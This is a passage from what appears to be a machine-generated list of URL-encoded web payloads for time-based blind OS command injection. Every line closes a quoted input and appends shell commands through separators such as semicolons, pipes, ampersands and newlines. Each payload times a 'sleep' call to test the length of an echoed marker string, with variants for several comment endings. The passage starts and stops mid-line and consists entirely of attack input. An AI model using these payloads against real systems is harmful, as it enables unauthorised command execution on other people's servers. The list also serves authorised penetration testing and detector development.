7C%20%5B%209%20-ne%20%24%28echo%20XWWMIW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ENIIMV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%22%7C%20%5B%201%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%202%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%203%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%204%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%205%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%206%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%207%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%208%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%7C%20%5B%209%20-ne%20%24%28echo%20SYHTME%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZDEMVI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%0A%20str%3D%24%28echo%20LOCFPZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UDCJAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%22%7C%20%5B%201%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%202%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%203%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%204%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%205%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%206%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%207%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%208%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%7C%20%5B%209%20-ne%20%24%28echo%20YPWXZB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NWAYIZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%0A%20str%3D%24%28echo%20DAECDG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%3B%20str%3D%24%28echo%20UPZCIJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%22%7C%20%5B%201%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%202%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%203%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%204%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%205%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%206%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%207%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%208%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%7C%20%5B%209%20-ne%20%24%28echo%20TPTKGE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZSTLVQ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%0A%20str%3D%24%28echo%20HKGDXH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%22%3B%20str%3